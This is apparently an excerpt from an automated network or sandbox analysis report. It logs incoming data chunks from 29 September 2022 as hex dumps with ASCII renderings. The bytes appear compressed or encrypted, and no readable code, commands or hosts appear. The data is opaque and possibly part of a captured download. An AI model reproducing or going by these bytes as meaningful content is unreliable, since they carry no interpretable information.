                                                                                                                                                    2022-09-29 12:58:59 UTC1973INData Raw: 9a ec 4f f6 71 36 f7 bc 2b f2 20 89 4e 9f 87 55 50 4f 63 f3 e8 4c 64 73 d1 7f b9 0a e2 cc a3 a6 41 04 11 46 40 8f a5 8f 3f 23 6e f8 85 92 86 c9 9e 54 c7 a9 3d d6 e9 54 02 6c 02 4c 05 27 16 3d 0b db af cf bb bb e9 ba f8 66 45 52 65 6f bd 2b 3c 84 af 4e 58 aa 54 96 80 4b 2d 69 5c 0a a2 31 2c 39 e1 fc 57 c0 d9 e4 ba aa c8 40 cd 24 e7 dc c3 b5 43 a8 ec 9d 65 e0 05 b7 d6 4f a4 fb d4 1e e8 d5 ca 5e 28 c2 dd d4 1d 1d 64 bc f5 d6 92 7d c7 83 29 d1 40 bd 4e 5b 69 77 ce 73 43 1f df 47 78 6e 5c 23 9d d2 48 4b ab 7f 6f fa b1 78 60 aa 47 7c 46 44 c6 d3 46 70 99 74 d7 8d 97 4e 72 68 e1 03 3f 26 f3 21 28 73 74 dd b2 48 10 a9 1b 46 aa a7 f5 65 c6 00 49 95 15 01 ba 7e 6c a1 96 29 b4 33 b3 31 19 ae 77 07 4e 86 96 4f 9d 22 94 df 21 3f 06 2d 62 e2 c3 c8 9a 20 32 d2 75 5c 30
                                                                                                                                                    Data Ascii: Oq6+ NUPOcLdsAF@?#nT=TlL'=fEReo+<NXTK-i\1,9W@$CeO^(d})@N[iwsCGxn\#HKox`G|FDFptNrh?&!(stHFeI~l)31wNO"!?-b 2u\0
                                                                                                                                                    2022-09-29 12:58:59 UTC1989INData Raw: 2c 11 e6 5a d9 6f 8e 4c 03 4f 61 b6 bc 34 ef a2 09 51 81 6f ec 23 d3 77 6f 1f cb ea 71 5d 2a 61 d2 e8 c4 76 b8 9e ba 2c e2 80 16 b6 df e6 18 7f 86 86 1b 9b e2 f9 cc 27 c3 6f d4 cd 9a d3 e7 b2 1f 2f 01 32 51 3f 09 82 43 41 e3 2b df c0 07 2e 16 ab 28 d4 c6 72 57 49 c5 65 2d b6 b2 a4 35 d6 3a 28 f2 01 c0 d7 9f 32 a4 c5 56 73 f4 b1 16 99 30 be 84 74 47 b9 4b 7e 64 01 9d e3 0f 53 f7 fd 3b 2b 2f 52 5a b3 6b 16 83 e2 ee 9e 02 2c c4 70 af d5 1c f1 03 38 3f 3b 8c 3a 54 b8 e4 47 eb cc dc a7 9e 14 96 19 8c bc c0 c3 7c db e5 49 35 fd 70 1d 2f 39 b3 23 48 93 bf d7 c9 28 75 77 82 32 64 ce 2b 2a 47 98 a9 76 bd fa 8a 68 a0 50 3b 67 53 39 50 fb c7 54 67 7c c2 ae 8c ad 9b 95 35 2a 75 e1 c8 28 d9 d4 12 c0 77 5e ac f6 46 1b 66 4f ea 60 d3 40 95 eb 69 0b a7 a7 6c 72 5a f2 0c
                                                                                                                                                    Data Ascii: ,ZoLOa4Qo#woq]*av,'o/2Q?CA+.(rWIe-5:(2Vs0tGK~dS;+/RZk,p8?;:TG|I5p/9#H(uw2d+*GvhP;gS9PTg|5*u(w^FfO`@ilrZ
                                                                                                                                                    2022-09-29 12:58:59 UTC2005INData Raw: 2d 80 0a 81 41 a7 c1 b1 3a 98 01 24 b3 00 24 87 65 3b cc df c8 fd e1 5c 75 73 f9 28 82 20 ab 8d 16 6e 55 10 88 e4 29 5a a7 ff a9 83 7e 4b b7 79 a7 b3 e3 27 88 c7 91 71 cd f1 ee 29 97 d1 cf 9a d0 b5 8d 39 d8 5b ca 2a 52 9e 69 4a c6 2a 9f b8 5e c8 47 27 a5 85 ca 01 cb f1 89 22 e7 af 1c 07 65 41 2a 99 6e 62 1f f9 14 27 54 d1 6c 6d e1 1c 50 5d 2d d0 9b ab d8 b8 fb 59 64 e7 b8 21 f8 24 91 1e a1 ed 8a 1c c9 f7 40 f2 a1 e2 77 28 c9 79 d7 bb 88 bd 12 df 83 05 72 14 ce 63 58 8c 59 1a c8 d9 f6 dd a2 a0 d4 87 e6 13 3e 22 22 62 41 6f 28 6d 67 ab 2d b8 73 db 3c f5 19 b1 4e f0 c5 e8 71 96 11 e3 fe f3 12 e8 7d 42 da 0f 42 6d ac b5 2c f1 e8 d1 82 0b 9d 8e da db 88 24 a0 08 f6 59 42 7c c3 7b 9d ea 76 1c 6a e9 60 c1 d7 08 07 db af a7 1a ea 1b c8 cf d8 88 d6 fa 8f d3 9c ef
                                                                                                                                                    Data Ascii: -A:$$e;\us( nU)Z~Ky'q)9[*RiJ*^G'"eA*nb'TlmP]-Yd!$@w(yrcXY>""bAo(mg-s<Nq}BBm,$YB|{vj`
                                                                                                                                                    2022-09-29 12:58:59 UTC2014INData Raw: dc ba 3e 87 ec 26 f6 0a ab c9 b0 22 73 71 19 ca a5 f8 d0 f8 2a b4 26 7c 4c 47 d3 72 26 32 00 17 92 7e 5e 7b 8d 26 7d 81 ad 56 5e f9 9c 70 5b c0 dd 00 ff b3 d8 ac 19 76 13 2c 78 e5 d9 d7 27 91 7d ff 0c 79 76 0f 3c 6d 6b b0 3a bc 02 98 1b 12 68 e5 4a 82 ab 9d 8b 01 fe 4a 09 4e 59 8c d6 7d 55 65 c7 8f 1c 51 99 78 3a 02 42 86 12 5c 57 9f 62 9f e3 a8 46 05 8d 8d a6 c2 ef 11 cb a8 6b c6 47 99 a7 7b 4c ee db 3e 1b 02 56 62 ef 5a cd 6c 1c a8 db 44 d0 62 95 6d bf 50 09 5b bd b2 2e 2f 0e 3c c8 d4 af 2a c0 ab b2 dd fe 8e d4 4c 4e e2 5a a2 6a 8d 38 10 2b 40 02 77 28 bb c4 c1 b6 97 9d c3 0c ff f1 51 5c 24 72 6d bd 2d de 65 77 e1 55 ec ca 76 a7 f0 99 af ea bd b5 40 83 c4 b2 22 a4 8f aa 79 f9 10 53 2b 33 60 28 05 67 11 62 2b b8 dd 49 57 61 89 62 5a 2b e1 82 72 02 68 af
                                                                                                                                                    Data Ascii: >&"sq*&|LGr&2~^{&}V^p[v,x'}yv<mk:hJJNY}UeQx:B\WbFkG{L>VbZlDbmP[./<*LNZj8+@w(Q\$rm-ewUv@"yS+3`(gb+IWabZ+rh
                                                                                                                                                    2022-09-29 12:58:59 UTC2030INData Raw: ab 66 5f 19 34 f9 87 2b 03 0f 80 fa c3 ee 6c 08 af b0 ad cf eb 28 3c a1 63 f5 f0 99 e3 37 bd 2d 37 4d db c3 59 6e fb ed 42 ea 6e ee 51 0f 2d 7b 89 6c db cc b2 f8 c1 e5 22 a0 dd 31 6b 36 72 ea 00 b9 99 2e 50 47 d1 a9 da 5b 4c e0 bc b9 a2 3b a8 87 e3 12 e7 63 21 32 6e fb 4b 8b e4 26 6a 9b 44 63 06 78 e9 34 b7 fd bc 3d c2 fe f3 cc bb 02 d7 93 8a ab 8f 07 0b 87 8f 67 b3 03 92 84 dd 83 b1 f1 53 81 3f d4 ea 49 04 1f 75 11 73 39 ad 70 81 87 12 ec 3a 85 24 7d e2 b9 ab 34 aa 56 de c5 1d e4 0f 27 10 63 e3 ff 83 17 f6 92 d6 08 70 c2 78 db 3e bb 10 a7 ff 12 be 51 8d ea f6 af f8 54 40 f9 31 15 f6 8e 60 0a 93 9c b7 08 0d 95 ed fe 58 9f 35 56 43 38 7a 8f 05 b1 40 7b e7 53 a8 40 71 5c 5c 52 32 3b 8e 91 d3 e8 29 07 18 71 b3 55 dd ee 58 0d 11 90 7f a6 a1 3b 27 29 0d 2f e8
                                                                                                                                                    Data Ascii: f_4+l(<c7-7MYnBnQ-{l"1k6r.PG[L;c!2nK&jDcx4=gS?Ius9p:$}4V'cpx>QT@1`X5VC8z@{S@q\\R2;)qUX;')/
                                                                                                                                                    2022-09-29 12:58:59 UTC2046INData Raw: d1 c2 37 5a 06 af 09 20 f2 e5 32 57 63 3c 62 ae 1a 43 98 86 2c 95 07 4e a4 fa de 5b 61 30 e8 17 87 3b 4d 64 bd 35 dc 9e 56 78 9b da 5f fa 8c 21 70 97 57 62 db bf b3 db 50 e2 c1 22 e6 69 e5 82 ff 94 68 f3 c6 a7 37 35 9b 7c ed 57 6d af e0 58 0a d8 40 b4 a0 bc 13 09 ce 8e 0f 2c 42 4b a4 82 42 46 25 18 c1 a0 4a 12 09 ee b6 dc e0 4f 2b 59 82 0e ee 17 8d b1 57 c1 4c f4 f8 73 7b 1e d8 32 1d b1 d3 c5 90 90 4d 23 0e 15 d3 14 43 28 db 8b 24 09 f3 26 0f b2 9a 79 93 f7 35 82 21 3c 17 be f5 12 ae 75 cf d3 2e 62 91 2d ba 58 fd eb 3d 50 5f 32 46 ef 9b ac aa f7 17 e2 82 c8 0b a1 5c 5b 53 4f ba cd cd c3 f9 e3 0b 49 15 69 b3 b2 23 dc 08 aa fe 07 36 de 80 86 f0 39 ce 93 a0 27 fa 0b f5 d7 7a a7 4a 02 d0 d2 02 eb 86 0f 28 68 17 3c f7 95 1a 53 fd 36 ae ff 19 fe 38 e1 d9 e4 0c
                                                                                                                                                    Data Ascii: 7Z 2Wc<bC,N[a0;Md5Vx_!pWbP"ih75|WmX@,BKBF%JO+YWLs{2M#C($&y5!<u.b-X=P_2F\[SOIi#69'zJ(h<S68
                                                                                                                                                    2022-09-29 12:58:59 UTC2062INData Raw: dd 11 eb 16 78 c5 bb dc d5 41 78 c2 47 f0 d9 ee b3 48 16 d1 92 0b dc a8 84 5f f1 72 af 10 b4 53 05 3f 63 0d 07 38 c0 d8 11 19 e7 e0 4d cc 6f 19 2b f9 ec d5 ce 2c fc f1 cf c2 d1 55 ff 8d a3 4e ba 61 e4 92 8f ea ea 2d e6 01 00 ab 9a 7e d4 0d 04 69 f9 b7 0e e1 12 27 3a 6c 80 82 b0 da 50 10 82 c5 48 8e a5 cd 06 2a 22 e0 47 b2 c4 ef c0 e0 a9 4f 63 90 8d 21 c7 27 8b 0d a6 a5 38 3a e9 be 4c e7 6f 3c 30 90 99 4a 28 ef 01 b1 de fa e3 40 09 59 25 0a 15 0d 58 b9 7b 1e 75 1a b3 6b ab 0a c4 22 c5 5b c0 8a bb 7b 0b a7 aa 19 f0 b6 90 e3 34 b8 73 2d ca 02 1a 86 70 60 90 94 9b 64 b7 fc 7e 74 8c 42 05 5b 0b 84 f1 cf e5 73 01 b2 a5 26 41 f3 ff fc 69 67 6e 06 e2 d8 6a 3a 92 92 36 2e 48 20 72 37 b6 25 7b 24 9d 08 d0 5f e9 d1 1e db ff e6 b0 9f 50 78 48 7d 91 0f cd 93 f5 7f 67
                                                                                                                                                    Data Ascii: xAxGH_rS?c8Mo+,UNa-~i':lPH*"GOc!'8:Lo<0J(@Y%X{uk"[{4s-p`d~tB[s&Aignj:6.H r7%{$_PxH}g
                                                                                                                                                    2022-09-29 12:58:59 UTC2078INData Raw: 1f db 5f 96 30 d9 f2 88 e6 67 49 4f f5 86 ad f1 5c 89 82 91 8b 01 43 4a 82 87 cf 5e 18 68 64 9b 37 64 63 15 2c 9e ca 36 bc 13 b3 70 31 11 a7 cb a2 a3 2f c7 9a 74 f8 37 47 d2 d7 22 9f 02 d0 88 c1 9c b6 9e 1e a9 57 25 9b e9 2a 26 fe cd cb a8 64 53 e5 64 eb 25 33 9e 7b 95 a4 6e a9 a6 60 f6 a4 df 05 5f 56 a7 c0 02 4e ba 7f 4d 6f b7 a8 62 9b be 5d 72 82 21 4a f2 ce 78 6f f8 3b 4b cf 00 5d 1c dc 02 f9 be bb f6 c0 cb cc 17 5c da 1a 89 82 26 43 73 cc 09 da d3 42 aa 9d 4a 58 21 b1 4f 19 14 df a6 44 b6 d0 21 1e 4a 8a 19 23 7b de d1 cb 71 1f 82 d1 41 94 c5 2e 84 7f fd 19 6c bf 42 9b 6c d1 3d 43 2d 08 da 0b 20 7b cc 49 b9 c1 0e ca 18 18 18 cf 87 17 82 08 26 4a 81 64 13 38 07 ac 82 7e 45 72 c7 0c 8a f4 30 62 71 db 92 72 83 dc 96 e6 ee 38 5f 54 4e 60 af 4b 35 38 71 d8
                                                                                                                                                    Data Ascii: _0gIO\CJ^hd7dc,6p1/t7G"W%*&dSd%3{n`_VNMob]r!Jxo;K]\&CsBJX!OD!J#{qA.lBl=C- {I&Jd8~Er0bqr8_TN`K58q
                                                                                                                                                    2022-09-29 12:58:59 UTC2094INData Raw: 0e 59 b1 28 1e 75 b9 cd 6f 97 5e c5 db 3b 41 6f 61 e2 6c 96 46 ca 38 e2 e3 3f 2c 67 33 d0 bb 76 98 9f 46 2a 88 e9 b6 45 63 1c 46 e8 b4 3c 93 17 1a 63 cf d1 dd a8 6e b9 f4 f2 ac d3 41 c0 54 0a 14 7a 97 40 fd de a0 d9 2d 9a ee 15 5f 3f 01 f0 55 cb 1b 8a 0e 35 ab 5e 2a 2f 61 44 ff 76 37 ab 8f 69 81 c8 f8 7b f7 87 71 cd ca a5 cd 5d b9 e1 21 5a b9 e3 c8 ed 9b 2a 7e b0 04 47 22 a6 d5 83 ce 8c 02 76 f5 7b 1e c7 70 d1 82 30 9e cc 61 25 e8 9c 92 ad 34 6a 15 67 65 e1 86 ce e9 3a 56 45 75 06 1e 8a 13 9d 12 42 51 ec 48 8c bc 4a 65 b5 9a 83 74 ba 69 ff 09 4a 04 00 ff b8 5b 2b 9a 55 36 41 94 cf 64 94 b4 60 ff 74 14 8b 5d af de 92 61 be f7 9a 7e 19 23 36 4b 95 c1 dc ce a5 4b 8d f5 58 ad 06 1c 1e 66 7a 9b 6d 88 eb a2 18 6b f9 71 8d d7 0e ab ed bf 37 ac dd c4 c3 f1 23 b1
                                                                                                                                                    Data Ascii: Y(uo^;AoalF8?,g3vF*EcF<cnATz@-_?U5^*/aDv7i{q]!Z*~G"v{p0a%4jge:VEuBQHJetiJ[+U6Ad`t]a~#6KKXfzmkq7#
                                                                                                                                                    2022-09-29 12:58:59 UTC2110INData Raw: 40 ff 9f 00 de 36 5e e9 cf 54 49 73 67 97 9f 7a f4 80 4c b2 22 1d 2d bd ae 3c 76 87 d5 80 f2 1b 18 1c 20 64 ef b0 30 10 d5 67 b9 ff 4e a8 3d 90 94 81 bd 57 5d db 65 42 53 e4 5d c2 7f 8b 8b 75 79 66 e7 16 08 79 12 ba e6 f7 c6 de d6 eb ff cf 21 a5 79 3f 87 f8 57 c9 df 3f 7a 4e b2 6b 30 13 f4 bd fc 3f 30 27 b6 e0 d2 fa 4d 20 4f 3b 28 15 20 94 c8 da 6b 95 d1 b0 f9 97 f5 73 f1 66 d5 92 1d 5f 27 a5 24 ab b0 74 3b 6d 87 c7 38 4f 56 76 8f 8c b9 d0 19 b8 4d ca 60 00 bd 25 11 c1 48 7c cd e8 10 e3 f9 bb 11 f4 f1 fe c2 88 5c 7d 41 98 b6 1f 19 fc a7 db 1a 7b 4b f4 cc 68 97 fc 47 63 55 0f 3b 39 8d a4 bd e9 b1 4b 60 a8 c9 e3 b9 f1 83 2e 7a b3 60 45 39 85 6a e5 13 10 ee 65 a1 da 36 f3 a3 43 6e e6 97 07 5f fd 61 b0 a3 ed 94 40 53 1e 5e a4 d5 47 53 49 8d 21 61 55 f5 cb 9f
                                                                                                                                                    Data Ascii: @6^TIsgzL"-<v d0gN=W]eBS]uyfy!y?W?zNk0?0'M O;( ksf_'$t;m8OVvM`%H|\}A{KhGcU;9K`.z`E9je6Cn_a@S^GSI!aU
                                                                                                                                                    2022-09-29 12:58:59 UTC2126INData Raw: 3d e6 be 52 20 84 94 91 bf cc e1 2d 31 a6 65 8b 76 7f db 8a 5a 53 7a 13 6f 08 4d 6e 60 6b a9 e4 bd fd a9 3d 96 21 61 3d 15 b3 fd 19 f7 17 97 6f 2d 57 c1 78 d9 d3 9c 48 89 1a bf ae 4e 99 e9 f4 40 ea 98 c9 20 ea 6e bf 4c 4f 8a 1f 04 1a fb 4d a0 86 b7 49 93 ee c6 a1 29 c5 d2 94 8d ac c4 0d 2e 93 52 97 ac 9a 0d f4 a9 f5 ef ac 14 fc 97 e7 fc ae 34 00 04 92 c8 4e ab ff 87 79 c2 5d 6a 84 a4 62 9e 6a 81 99 50 7d 20 e2 5a 2f a7 72 f9 2d aa ad d7 36 30 d6 ff 37 06 d1 cb 3d 1c dd 35 c6 61 7a aa b3 7c b6 09 88 39 58 06 0b 19 b5 00 67 6b 7d a3 c6 3c 97 d3 57 4e 67 39 92 75 38 d8 1e 68 73 71 e6 24 3f 74 52 8a a3 a8 4e 00 8f ef b8 89 a7 74 4b 2b 64 03 92 ce 1e 4a a5 74 a5 a2 08 a0 f9 6a 01 42 14 a0 e8 c0 f5 91 23 b5 25 63 61 88 13 c5 2f eb a9 5c de 92 b8 c1 96 5f 30 a2
                                                                                                                                                    Data Ascii: =R -1evZSzoMn`k=!a=o-WxHN@ nLOMI).R4Ny]jbjP} Z/r-607=5az|9Xgk}<WNg9u8hsq$?tRNtK+dJtjB#%ca/\_0
                                                                                                                                                    2022-09-29 12:58:59 UTC2142INData Raw: d5 e1 53 80 61 a2 80 f0 62 b6 6f 1f fe 25 33 e8 1e b3 5a 3c e5 f2 b3 d0 5f 3e 95 dc 41 86 34 aa d8 4f bd 59 ce ff b2 db ed c1 fe b3 35 31 ca 79 4c b2 38 5f 96 b6 5c bb f1 99 1f 79 51 21 bf f6 83 1b ef cf 78 22 f1 58 42 52 c2 fd 9f 62 16 af 64 3a d6 21 85 d3 fc 9e f8 a9 88 ad b6 79 ce 4f 25 c2 55 f7 8d 56 34 c0 e4 fc 25 f3 8c f0 d2 8d c0 21 28 fe 32 60 da 93 6d a3 38 73 72 81 b4 8a f9 9b 6f 21 91 d8 98 a5 bb f5 f9 d0 40 b1 2f 7c 3d 68 83 9e 40 e4 aa 96 54 9e 56 fa 8b b3 dd f4 97 bb 21 84 ce 44 70 2d 98 6b 85 5f 2d 44 ca 65 59 cf c0 ed ea 28 27 60 06 ae e1 d0 26 33 83 c0 53 20 9e ef 3d 84 99 29 bc 91 ce 23 71 54 6d 27 4f b0 af dc c9 5d a3 20 41 ca 4c c1 62 bc 4b ba 83 65 be 05 13 cd 60 bf 0a 4b 3b 0f 80 a6 3e 23 ae 6e c1 7c 13 83 c5 09 6e f2 08 d9 af 74 6c
                                                                                                                                                    Data Ascii: Sabo%3Z<_>A4OY51yL8_\yQ!x"XBRbd:!yO%UV4%!(2`m8sro!@/|=h@TV!Dp-k_-DeY('`&3S =)#qTm'O] ALbKe`K;>#n|ntl
                                                                                                                                                    2022-09-29 12:58:59 UTC2158INData Raw: 58 eb b5 78 26 9a 3c 7d fa 7c e5 9b ef d2 8d f2 72 af 96 89 48 9b ac 84 8b b9 82 ad c2 47 61 62 b8 48 77 4b 84 0d f8 85 88 4c 5a bc 6a 5d 7d 07 e3 8a 9f e3 3d 41 6c 6f eb dd a9 5a 9f 48 20 b3 31 5d 38 60 d0 a8 37 f7 85 f7 06 e8 58 a7 71 a9 14 56 8f 02 ed d3 f0 a7 4c dd 3e 0c a3 f7 5c f3 3c ef f8 fa 01 2f 03 72 ad 61 2f 46 d5 84 f4 e4 78 67 11 0c c0 5f 98 aa 11 f0 e3 0e af 81 4f 29 c9 15 11 e4 c1 6a c2 2d 70 c6 6d 18 82 8c cc be 77 8f 94 85 94 c1 21 70 c3 36 69 c9 28 4c a7 ef 87 10 51 f3 7c 1e 3f 30 6f 7f 8c da 4a 9e f8 26 03 08 f5 c6 92 6b 64 90 37 5a ee 83 6b be 98 9d 05 00 98 ac fd 83 d9 62 db 00 7d c8 9a b7 93 b4 cf e2 63 0a cb 8d 9e cc ac 1a b9 3b 42 37 cd 4a 66 9b 42 69 4a d5 24 cc c5 73 c2 d4 71 d5 3b 23 4e 34 06 c2 8e dd 42 d9 54 c6 d5 2a f3 57 a3
                                                                                                                                                    Data Ascii: Xx&<}|rHGabHwKLZj]}=AloZH 1]8`7XqVL>\</ra/Fxg_O)j-pmw!p6i(LQ|?0oJ&kd7Zkb}c;B7JfBiJ$sq;#N4BT*W
                                                                                                                                                    2022-09-29 12:58:59 UTC2174INData Raw: c1 9c 18 94 36 d1 22 a6 3e 49 65 c5 37 cf ee f6 29 df d3 3f de ab 36 13 27 76 5e ea 25 80 f8 67 8f 87 bc 21 7f 0b 69 76 72 da 47 81 51 83 03 75 c3 5a bd 41 76 36 e9 4a 16 7d 10 41 c4 25 5d dc 6a 4c d3 f4 cb 5b f7 8e 89 af a3 66 55 79 67 bd 3d 3d 17 3d ab ba fb 4f 02 cb 50 20 64 bd d7 40 c5 3e 90 a5 f8 44 f1 f2 6f b5 be 29 00 9f fa 19 03 b4 98 9b 17 1b d0 b0 87 5a f3 ac 9c 27 c2 b3 be bc 88 45 d9 8f 5c fe bc ba 65 45 69 7a 9d b6 17 d7 8c 52 98 b8 31 9d c9 4b 91 0b a8 9f 25 c0 12 e4 8c da 37 77 05 0c 0c ce 69 17 9f ac a8 79 a5 32 17 f4 ea f0 43 78 7a 39 97 7a df f3 13 b2 2a dc 43 30 e0 46 27 cc 8d 6e b5 51 2c 41 b5 06 eb 74 a3 f4 17 43 06 24 19 5d 3e a4 78 3b 54 c4 f0 13 c4 ed e9 3d 66 2a 7a a7 c4 6f 3e 26 85 4b f6 35 9f 3f 76 4a 8a 84 9e 49 cd 4f 96 40 21
                                                                                                                                                    Data Ascii: 6">Ie7)?6'v^%g!ivrGQuZAv6J}A%]jL[fUyg===OP d@>Do)Z'E\eEizR1K%7wiy2Cxz9z*C0F'nQ,AtC$]>x;T=f*zo>&K5?vJIO@!
                                                                                                                                                    2022-09-29 12:58:59 UTC2190INData Raw: c3 21 d7 a3 a4 eb 7d 5c 6c a2 73 5a e3 56 61 c0 7d f9 ec b5 47 e1 2f 4e a5 19 b8 c7 d7 b7 71 4e f4 5f 16 f2 fe 37 f5 48 e5 db c2 0b 1e 8d 2c 48 c7 86 d5 31 28 e1 06 14 0d 8e 03 f2 c1 dd 7d 98 da ab 72 83 6f c7 f7 fc a2 80 cb 10 a4 05 55 1b 2e e3 37 43 fe 3c 71 77 45 b7 b2 d2 00 6c 3d dc 70 c0 7e de f3 35 94 53 35 4a f4 3c 06 56 00 ec 63 98 4f f1 19 6d af 6a fc 4a c2 e6 da 17 57 61 59 dd ff ef 3a 84 dd fb 0a 8d e6 38 ff 50 aa 35 83 d3 ae d7 f1 fa ac 76 8f 7a ea dc 24 c1 60 b2 c8 f4 74 f5 0f f7 20 d0 3c 4f 15 dd 39 38 89 19 d8 72 ff f2 ae 22 e6 d7 a9 f7 7c a5 8e b7 a6 42 f8 fc 3c 9a d2 32 10 da 03 c6 fe e6 b4 79 d1 82 e8 c1 f4 b2 a7 d5 09 18 1e ec d8 12 30 9e a0 5c ae f2 cb c2 da 9d 33 02 70 1a e2 ab 06 93 3f 0d 0b fc 10 4f eb 1f ce a4 97 cb ad e0 d7 c5 e3
                                                                                                                                                    Data Ascii: !}\lsZVa}G/NqN_7H,H1(}roU.7C<qwEl=p~5S5J<VcOmjJWaY:8P5vz$`t <O98r"|B<2y0\3p?O
                                                                                                                                                    2022-09-29 12:58:59 UTC2206INData Raw: 8f 46 0e ac ff fd 63 09 bc 52 89 4d fc 4b 79 fa 84 ee d9 3f bc 00 1d bb c9 f6 a2 c4 53 66 59 67 22 23 31 86 94 0a cf 5b 4f 1f 50 1f d6 cf 91 13 0f 9a e6 cf 4c 0b 68 3f c6 83 75 55 bd ae 5a 74 9e 8f 03 3a 2f bd f2 e7 b7 7d 81 fa 1c 25 16 e4 f3 38 4b 65 2e d2 f8 90 5c 10 2c e4 27 b7 ae 93 d3 21 ae be ef c6 d2 8b 94 7a 01 c7 50 98 43 ef 0c c0 81 69 57 0e ff 45 09 28 7d c2 8a 04 7a 58 5b 19 04 d0 15 4c 86 7c 8f b9 bd 53 a5 ed 70 13 65 9c 87 40 03 8f 16 9f 18 7c 1d 43 16 ed f9 53 ce 9d 7e 31 a7 ae bc 07 2d e6 3a e0 94 30 a1 47 f8 dd fd a7 8c dc 74 c4 47 8c d2 1e fd 41 24 91 03 7f 92 98 0d 47 1e 89 ca 7b 14 0a c6 64 52 05 55 0d 13 d7 68 25 23 2c 29 e9 2e 26 77 94 8b 06 83 52 22 16 a9 8b bf 34 a7 4f d6 e0 eb fc 94 65 cf 3e c1 19 7b 68 b3 39 b5 84 ea 74 29 4b 81
                                                                                                                                                    Data Ascii: FcRMKy?SfYg"#1[OPLh?uUZt:/}%8Ke.\,'!zPCiWE(}zX[L|Spe@|CS~1-:0GtGA$G{dRUh%#,).&wR"4Oe>{h9t)K
                                                                                                                                                    2022-09-29 12:58:59 UTC2222INData Raw: 43 a5 9d 15 f3 2e ed f5 51 96 f5 73 7b c4 00 44 56 8a 93 e2 fb a6 4f 10 8b 14 e2 e8 54 79 d5 a8 b7 a4 96 f5 0a 04 44 f2 81 6a af 13 8b 9b 08 eb 45 62 3e 2f 6f 34 8f e0 e1 f7 e7 c8 f0 4f cc 19 39 16 c0 ff 19 37 e8 3a 17 cf 8f af d3 e7 02 4b 98 3b 81 ce 34 de 6e e3 4d f4 af 46 4c a2 a7 3b 5b 4a 79 17 51 53 5c 34 3f 15 7f 39 b1 b8 1b e5 63 a3 aa 94 6d 94 a4 fc b9 9d ce 3a 42 a2 9b 24 f8 ec 49 5e e1 1a 87 81 4f d1 62 b2 b8 d3 b2 4e 1f e5 c1 a0 fe 97 8b 38 dc 5a 8f fb c4 8a dd 98 bc d0 89 1c 1c da cd cf 1b d5 33 cd 00 63 b4 61 24 ae 84 47 af 95 86 10 06 19 c8 ef d5 3c df 9b 96 c0 fe 55 59 b1 f1 f2 04 d5 b1 2a 82 80 cf 75 43 d7 6a b3 de 06 46 72 0f 9b 5f 00 66 2b 3c 87 3c fd 63 55 50 37 1d 27 20 4b b9 57 8c cd 1b e2 5e 9a 08 d7 b8 d7 9c 65 49 61 d1 04 62 b7 5d
                                                                                                                                                    Data Ascii: C.Qs{DVOTyDjEb>/o4O97:K;4nMFL;[JyQS\4?9cm:B$I^ObN8Z3ca$G<UY*uCjFr_f+<<cUP7' KW^eIab]
                                                                                                                                                    2022-09-29 12:58:59 UTC2238INData Raw: 7f 17 28 44 8d 85 c6 15 cd dc 4e 87 4e 1a 27 d4 6b 30 ac b3 eb aa 2b d1 4c 78 d1 a9 8a f3 6a ca e8 86 07 c5 c0 1a 7a 64 cd cc ac b2 7c 82 d7 83 24 53 ab 27 69 60 dd 37 df 5a db 2f 6c 35 95 67 26 c3 2f 1c 33 63 5e 31 a5 58 86 b9 88 6b db 89 53 fd ee fe 7b 7b 28 2f 22 47 b6 72 24 ea 19 2b 85 82 ab 51 77 f2 1f 4b 01 b9 75 57 de 21 aa 73 92 ff d1 14 66 6d 97 8c 33 49 a3 86 85 67 06 1c 18 a3 65 57 ab a6 51 67 66 bb 26 55 4d a5 90 9a 89 11 66 bd 61 bc 4a eb 39 99 bf dd 3a f2 7b 35 b9 20 99 dc 68 54 a5 7c 0f df 4d be b4 07 03 8c 5e 94 5d 03 6c 5f e8 85 e1 a2 9b 27 36 77 55 4e d4 18 62 bc 23 db 63 5d 46 2b 15 92 ac 83 72 c4 4b b3 e4 ba a6 f5 68 8c 91 71 35 d8 8f a3 f3 87 14 d7 2f 3d 97 c0 8a 68 4a 75 50 73 d7 64 3f e8 7a 23 1a c2 13 af da 2e b0 16 d4 91 b1 53 9d
                                                                                                                                                    Data Ascii: (DNN'k0+Lxjzd|$S'i`7Z/l5g&/3c^1XkS{{(/"Gr$+QwKuW!sfm3IgeWQgf&UMfaJ9:{5 hT|M^]l_'6wUNb#c]F+rKhq5/=hJuPsd?z#.S
                                                                                                                                                    2022-09-29 12:58:59 UTC2254INData Raw: d1 cf f8 66 06 bb 43 98 f0 ea e4 06 f1 3a e9 d2 28 f1 e9 e1 9a c0 df bd 3d 79 cd b0 90 b0 53 69 33 cb 76 a9 b0 42 78 d1 8e c1 69 a4 7a 6e 2a 16 ac 87 dc 0a 4e 55 44 95 2d ac 63 f8 79 c5 a0 3b b4 74 cf b0 b9 ac cd 36 1d 58 a8 bf 8d 05 73 37 36 be bf 63 b4 e4 ee 4c b8 55 92 fc 35 cf 67 83 59 0e a2 8b 0e a6 6f e7 b8 88 71 0c a3 f4 db 8c 3a 84 d2 a7 d6 f2 35 fb cb 9e f8 8c 44 4b a0 ac c8 ac 14 97 53 1f ab c1 8e 01 0c af 10 77 54 b9 7e e2 05 84 8e 4c ed 5f 0f 75 bf 65 8f f2 65 98 c3 29 df 06 fc f6 89 e9 a5 9d cd d1 da 78 59 68 be 0f 3f 39 ea 22 e9 9a b2 ad 9f ca 91 c5 98 f3 b0 12 43 22 3e e8 ac 0a ba ca 08 4b cc f4 f0 d6 a5 a7 14 62 14 f3 22 41 e3 18 54 0a 0d 67 fd 36 61 72 04 31 a6 57 e4 8c 86 32 74 2b 35 ca 55 46 3b 4e 50 3c e0 2b cf 58 d0 0a 14 c4 72 9d f3
                                                                                                                                                    Data Ascii: fC:(=ySi3vBxizn*NUD-cy;t6Xs76cLU5gYoq:5DKSwT~L_uee)xYh?9"C">Kb"ATg6ar1W2t+5UF;NP<+Xr
